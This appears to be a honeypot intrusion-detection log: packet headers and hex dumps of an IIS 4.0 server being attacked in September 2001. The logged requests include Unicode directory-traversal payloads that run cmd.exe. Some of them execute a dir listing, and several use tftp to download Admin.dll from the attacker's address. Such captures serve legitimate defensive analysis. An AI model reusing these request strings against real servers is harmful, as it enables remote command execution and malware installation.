030 : 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F    www..Connnectio
040 : 6E 3A 20 63 6C 6F 73 65 0D 0A                     n: close..
----------------------------------------------------------------------------
--
#(2 - 25387) [2001-09-18 10:20:34]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=25092 flags=0 offset=0 TTL=128 chksum=59286
TCP:  port=80 -> dport: 2154  flags=***A**** seq=486300
      ack=478595622 off=5 res=0 win=8684 urp=0 chksum=33193
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25388) [2001-09-18 10:20:34]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=279 ID=26116 flags=0 offset=0 TTL=128 chksum=58023
TCP:  port=80 -> dport: 2154  flags=***AP*** seq=486300
      ack=478595622 off=5 res=0 win=8684 urp=0 chksum=19230
Payload:  length = 239

000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72   HTTP/1.1 500 Ser
010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65   ver Error..Serve
020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53   r: Microsoft-IIS
030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C   /4.0..Date: Tue,
040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A    18 Sep 2001 16:
050 : 30 34 3A 31 35 20 47 4D 54 0D 0A 43 6F 6E 74 65   04:15 GMT..Conte
060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74   nt-Type: text/ht
070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67   ml..Content-Leng
080 : 74 68 3A 20 31 30 30 0D 0A 0D 0A 3C 68 74 6D 6C   th: 100....<html
090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72
><head><title>Er
0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61
ror</title></hea
0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 73 70 65 63   d><body>The
spec
0c0 : 69 66 69 65 64 20 6D 6F 64 75 6C 65 20 63 6F 75   ified module cou
0d0 : 6C 64 20 6E 6F 74 20 62 65 20 66 6F 75 6E 64 2E   ld not be found.
0e0 : 20 3C 2F 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
</body></html>
----------------------------------------------------------------------------
--
#(2 - 25389) [2001-09-18 10:20:34]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=26372 flags=0 offset=0 TTL=128 chksum=58006
TCP:  port=80 -> dport: 2154  flags=***A***F seq=486539
      ack=478595622 off=5 res=0 win=8684 urp=0 chksum=32953
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25390) [2001-09-18 10:20:34]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=10559 flags=0 offset=0 TTL=118 chksum=10844
TCP:  port=2154 -> dport: 80  flags=*****R** seq=478595622
      ack=0 off=5 res=0 win=0 urp=0 chksum=3909
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25391) [2001-09-18 10:20:34]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=10815 flags=0 offset=0 TTL=118 chksum=10584
TCP:  port=2248 -> dport: 80  flags=******S* seq=478596387
      ack=0 off=6 res=0 win=8192 urp=0 chksum=54319
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25392) [2001-09-18 10:20:34]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=27396 flags=0 offset=0 TTL=128 chksum=56978
TCP:  port=80 -> dport: 2248  flags=***A**S* seq=487511
      ack=478596388 off=6 res=0 win=8760 urp=0 chksum=24968
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25393) [2001-09-18 10:20:34]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=11327 flags=0 offset=0 TTL=118 chksum=26460
TCP:  port=2154 -> dport: 80  flags=*****R** seq=478595622
      ack=478595622 off=5 res=0 win=0 urp=0 chksum=10392
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25394) [2001-09-18 10:20:35]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=9536 flags=0 offset=0 TTL=119 chksum=11611
TCP:  port=2248 -> dport: 80  flags=***A**** seq=478596388
      ack=487512 off=5 res=0 win=8760 urp=0 chksum=31045
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25395) [2001-09-18 10:20:38]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=157 ID=21314 flags=0 offset=0 TTL=119 chksum=65251
TCP:  port=2248 -> dport: 80  flags=***AP*** seq=478596388
      ack=487512 off=5 res=0 win=8760 urp=0 chksum=30371
Payload:  length = 111

000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E   GET /_vti_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E   %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31   dir c+dir HTTP/1
050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43   .0..Host: www..C
060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F      onnnection: clo
----------------------------------------------------------------------------
--
#(2 - 25396) [2001-09-18 10:20:38]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=231 ID=30212 flags=0 offset=0 TTL=128 chksum=53975
TCP:  port=80 -> dport: 2248  flags=***AP*** seq=487512
      ack=478596505 off=5 res=0 win=8643 urp=0 chksum=9103
Payload:  length = 191

000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D   HTTP/1.1 200 OK.
010 : 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F   .Server: Microso
020 : 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65   ft-IIS/4.0..Date
030 : 3A 20 54 75 65 2C 20 31 38 20 53 65 70 20 32 30   : Tue, 18 Sep 20
040 : 30 31 20 31 36 3A 30 34 3A 31 38 20 47 4D 54 0D   01 16:04:18 GMT.
050 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61   .Content-Type: a
060 : 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74   pplication/octet
070 : 2D 73 74 72 65 61 6D 0D 0A 56 6F 6C 75 6D 65 20   -stream..Volume 
080 : 69 6E 20 64 72 69 76 65 20 43 20 68 61 73 20 6E   in drive C has n
090 : 6F 20 6C 61 62 65 6C 2E 0D 0A 56 6F 6C 75 6D 65   o label...Volume
0a0 : 20 53 65 72 69 61 6C 20 4E 75 6D 62 65 72 20 69    Serial Number i
0b0 : 73 20 38 30 42 34 2D 38 39 43 41 0D 0A 0D 0A      s 80B4-89CA....
----------------------------------------------------------------------------
--
#(2 - 25397) [2001-09-18 10:20:38]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=564 ID=30468 flags=0 offset=0 TTL=128 chksum=53386
TCP:  port=80 -> dport: 2248  flags=***AP**F seq=487703
      ack=478596505 off=5 res=0 win=8643 urp=0 chksum=21986
Payload:  length = 524

000 : 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 43 3A    Directory of C:
010 : 5C 49 6E 65 74 70 75 62 5C 77 77 77 72 6F 6F 74   \Inetpub\wwwroot
020 : 0D 0A 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 30   ....09/18/01  10
030 : 3A 35 34 61 20 20 20 20 20 20 20 20 3C 44 49 52   :54a        <DIR
040 : 3E 20 20 20 20 20 20 20 20 20 20 2E 0D 0A 30 39   >          ...09
050 : 2F 31 38 2F 30 31 20 20 31 30 3A 35 34 61 20 20   /18/01  10:54a  
060 : 20 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20         <DIR>

070 : 20 20 20 20 20 2E 2E 0D 0A 30 39 2F 31 38 2F 30        ....09/18/0
080 : 31 20 20 31 30 3A 35 34 61 20 20 20 20 20 20 20   1  10:54a       
090 : 20 3C 44 49 52 3E 20 20 20 20 20 20 20 20 20 20    <DIR>

0a0 : 63 67 69 2D 62 69 6E 0D 0A 30 39 2F 31 38 2F 30   cgi-bin..09/18/0
0b0 : 31 20 20 31 30 3A 35 34 61 20 20 20 20 20 20 20   1  10:54a       
0c0 : 20 20 20 20 20 20 20 20 20 20 34 2C 36 36 33 20             4,663 
0d0 : 64 65 66 61 75 6C 74 2E 61 73 70 0D 0A 30 39 2F   default.asp..09/
0e0 : 31 38 2F 30 31 20 20 31 30 3A 35 34 61 20 20 20   18/01  10:54a   
0f0 : 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 20        <DIR>

100 : 20 20 20 20 69 6D 61 67 65 73 0D 0A 30 39 2F 31       images..09/1
110 : 38 2F 30 31 20 20 31 30 3A 35 34 61 20 20 20 20   8/01  10:54a    
120 : 20 20 20 20 20 20 20 20 20 20 20 20 20 32 2C 35                2,5
130 : 30 34 20 70 6F 73 74 69 6E 66 6F 2E 68 74 6D 6C   04 postinfo.html
140 : 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 30 3A 35   ..09/18/01  10:5
150 : 34 61 20 20 20 20 20 20 20 20 3C 44 49 52 3E 20   4a
<DIR> 
160 : 20 20 20 20 20 20 20 20 20 5F 70 72 69 76 61 74            _privat
170 : 65 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 30 3A   e..09/18/01  10:
180 : 35 34 61 20 20 20 20 20 20 20 20 20 20 20 20 20   54a             
190 : 20 20 20 20 31 2C 37 35 39 20 5F 76 74 69 5F 69       1,759 _vti_i
1a0 : 6E 66 2E 68 74 6D 6C 0D 0A 20 20 20 20 20 20 20   nf.html..       
1b0 : 20 20 20 20 20 20 20 20 38 20 46 69 6C 65 28 73           8 File(s
1c0 : 29 20 20 20 20 20 20 20 20 20 20 38 2C 39 32 36   )          8,926
1d0 : 20 62 79 74 65 73 0D 0A 20 20 20 20 20 20 20 20    bytes..        
1e0 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                   
1f0 : 20 20 32 2C 31 30 30 2C 38 38 33 2C 34 35 36 20     2,100,883,456 
200 : 62 79 74 65 73 20 66 72 65 65 0D 0A               bytes free..
----------------------------------------------------------------------------
--
#(2 - 25398) [2001-09-18 10:20:38]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=30274 flags=0 offset=0 TTL=118 chksum=56664
TCP:  port=2248 -> dport: 80  flags=*****R** seq=478596505
      ack=0 off=5 res=0 win=0 urp=0 chksum=2932
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25399) [2001-09-18 10:20:38]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=30530 flags=0 offset=0 TTL=118 chksum=56404
TCP:  port=2610 -> dport: 80  flags=******S* seq=478856437
      ack=0 off=6 res=0 win=8192 urp=0 chksum=56047
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25400) [2001-09-18 10:20:38]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=30724 flags=0 offset=0 TTL=128 chksum=53650
TCP:  port=80 -> dport: 2610  flags=***A**S* seq=491256
      ack=478856438 off=6 res=0 win=8760 urp=0 chksum=22951
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25401) [2001-09-18 10:20:38]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=30786 flags=0 offset=0 TTL=118 chksum=7001
TCP:  port=2248 -> dport: 80  flags=*****R** seq=478596505
      ack=478596505 off=5 res=0 win=0 urp=0 chksum=8532
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25402) [2001-09-18 10:20:38]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=37442 flags=0 offset=0 TTL=119 chksum=49240
TCP:  port=2610 -> dport: 80  flags=***A**** seq=478856438
      ack=491257 off=5 res=0 win=8760 urp=0 chksum=29028
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25403) [2001-09-18 10:20:38]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=212 ID=37698 flags=0 offset=0 TTL=119 chksum=48812
TCP:  port=2610 -> dport: 80  flags=***AP*** seq=478856438
      ack=491257 off=5 res=0 win=8760 urp=0 chksum=13294
Payload:  length = 156

000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E   GET /_vti_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E   %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
040 : 74 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34   tftp -i 65.29.24
050 : 33 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E   3.180 GET Admin.
060 : 64 6C 6C 20 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C   dll c:\Admin.dll
070 : 20 25 32 30 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C    %20c:\Admin.dll
080 : 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A    HTTP/1.0..Host:
090 : 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65                www..Connne
----------------------------------------------------------------------------
--
#(2 - 25404) [2001-09-18 10:20:38]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=395 ID=30980 flags=0 offset=0 TTL=128 chksum=53043
TCP:  port=80 -> dport: 2610  flags=***AP*** seq=491257
      ack=478856610 off=5 res=0 win=8588 urp=0 chksum=2336
Payload:  length = 355

000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74   HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76   eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49   er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65   S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36   , 18 Sep 2001 16
050 : 3A 30 34 3A 31 39 20 47 4D 54 0D 0A 43 6F 6E 74   :04:19 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D   ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74   .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61   ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F   n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65   rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69   cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65   cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69   d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65   ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72   t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20   s.  The headers 
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72   it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E                                          re>
----------------------------------------------------------------------------
--
#(2 - 25405) [2001-09-18 10:20:38]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=31236 flags=0 offset=0 TTL=128 chksum=53142
TCP:  port=80 -> dport: 2610  flags=***A***F seq=491612
      ack=478856610 off=5 res=0 win=8588 urp=0 chksum=28672
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25406) [2001-09-18 10:20:39]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=46914 flags=0 offset=0 TTL=118 chksum=40024
TCP:  port=2610 -> dport: 80  flags=*****R** seq=478856610
      ack=0 off=5 res=0 win=0 urp=0 chksum=4605
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25407) [2001-09-18 10:20:39]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=47170 flags=0 offset=0 TTL=118 chksum=39764
TCP:  port=2637 -> dport: 80  flags=******S* seq=478856730
      ack=0 off=6 res=0 win=8192 urp=0 chksum=55727
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25408) [2001-09-18 10:20:39]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=31492 flags=0 offset=0 TTL=128 chksum=52882
TCP:  port=80 -> dport: 2637  flags=***A**S* seq=491757
      ack=478856731 off=6 res=0 win=8760 urp=0 chksum=22130
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25409) [2001-09-18 10:20:39]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=47426 flags=0 offset=0 TTL=118 chksum=55896
TCP:  port=2610 -> dport: 80  flags=*****R** seq=478856610
      ack=478856610 off=5 res=0 win=0 urp=0 chksum=12240
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25410) [2001-09-18 10:20:39]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=59714 flags=0 offset=0 TTL=119 chksum=26968
TCP:  port=2637 -> dport: 80  flags=***A**** seq=478856731
      ack=491758 off=5 res=0 win=8760 urp=0 chksum=28207
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25411) [2001-09-18 10:20:39]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=212 ID=59970 flags=0 offset=0 TTL=119 chksum=26540
TCP:  port=2637 -> dport: 80  flags=***AP*** seq=478856731
      ack=491758 off=5 res=0 win=8760 urp=0 chksum=12217
Payload:  length = 156

000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E   GET /_vti_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E   %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
040 : 74 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34   tftp -i 65.29.24
050 : 33 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E   3.180 GET Admin.
060 : 64 6C 6C 20 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C   dll d:\Admin.dll
070 : 20 25 32 30 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C    %20d:\Admin.dll
080 : 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A    HTTP/1.0..Host:
090 : 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65                www..Connne
----------------------------------------------------------------------------
--
#(2 - 25412) [2001-09-18 10:20:39]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=395 ID=31748 flags=0 offset=0 TTL=128 chksum=52275
TCP:  port=80 -> dport: 2637  flags=***AP*** seq=491758
      ack=478856903 off=5 res=0 win=8588 urp=0 chksum=1268
Payload:  length = 355

000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74   HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76   eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49   er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65   S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36   , 18 Sep 2001 16
050 : 3A 30 34 3A 32 30 20 47 4D 54 0D 0A 43 6F 6E 74   :04:20 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D   ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74   .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61   ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F   n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65   rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69   cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65   cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69   d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65   ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72   t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20   s.  The headers 
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72   it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E                                          re>
----------------------------------------------------------------------------
--
#(2 - 25413) [2001-09-18 10:20:39]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=32004 flags=0 offset=0 TTL=128 chksum=52374
TCP:  port=80 -> dport: 2637  flags=***A***F seq=492113
      ack=478856903 off=5 res=0 win=8588 urp=0 chksum=27851
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25414) [2001-09-18 10:20:40]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=22595 flags=0 offset=0 TTL=118 chksum=64343
TCP:  port=2637 -> dport: 80  flags=*****R** seq=478856903
      ack=0 off=5 res=0 win=0 urp=0 chksum=4285
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25415) [2001-09-18 10:20:40]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=24131 flags=0 offset=0 TTL=118 chksum=13656
TCP:  port=2637 -> dport: 80  flags=*****R** seq=478856903
      ack=478856903 off=5 res=0 win=0 urp=0 chksum=11627
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25418) [2001-09-18 10:20:42]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=37445 flags=0 offset=0 TTL=118 chksum=49489
TCP:  port=2735 -> dport: 80  flags=******S* seq=478857651
      ack=0 off=6 res=0 win=8192 urp=0 chksum=54708
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25419) [2001-09-18 10:20:42]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=34564 flags=0 offset=0 TTL=128 chksum=49810
TCP:  port=80 -> dport: 2735  flags=***A**S* seq=495592
      ack=478857652 off=6 res=0 win=8760 urp=0 chksum=17276
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25420) [2001-09-18 10:20:43]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=31302 flags=0 offset=0 TTL=119 chksum=55380
TCP:  port=2735 -> dport: 80  flags=***A**** seq=478857652
      ack=495593 off=5 res=0 win=8760 urp=0 chksum=23353
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25421) [2001-09-18 10:20:43]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=212 ID=31558 flags=0 offset=0 TTL=119 chksum=54952
TCP:  port=2735 -> dport: 80  flags=***AP*** seq=478857652
      ack=495593 off=5 res=0 win=8760 urp=0 chksum=7107
Payload:  length = 156

000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E   GET /_vti_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E   %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
040 : 74 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34   tftp -i 65.29.24
050 : 33 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E   3.180 GET Admin.
060 : 64 6C 6C 20 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C   dll e:\Admin.dll
070 : 20 25 32 30 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C    %20e:\Admin.dll
080 : 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A    HTTP/1.0..Host:
090 : 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65                www..Connne
----------------------------------------------------------------------------
--
#(2 - 25422) [2001-09-18 10:20:43]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=35076 flags=0 offset=0 TTL=128 chksum=49302
TCP:  port=80 -> dport: 2735  flags=***A**** seq=495593
      ack=478857824 off=5 res=0 win=8588 urp=0 chksum=23353
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25528) [2001-09-18 10:21:36]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=395 ID=34054 flags=0 offset=0 TTL=128 chksum=49969
TCP:  port=80 -> dport: 2735  flags=***AP*** seq=495593
      ack=478857824 off=5 res=0 win=8588 urp=0 chksum=61943
Payload:  length = 355

000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74   HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76   eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49   er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65   S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36   , 18 Sep 2001 16
050 : 3A 30 35 3A 31 36 20 47 4D 54 0D 0A 43 6F 6E 74   :05:16 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D   ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74   .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61   ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F   n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
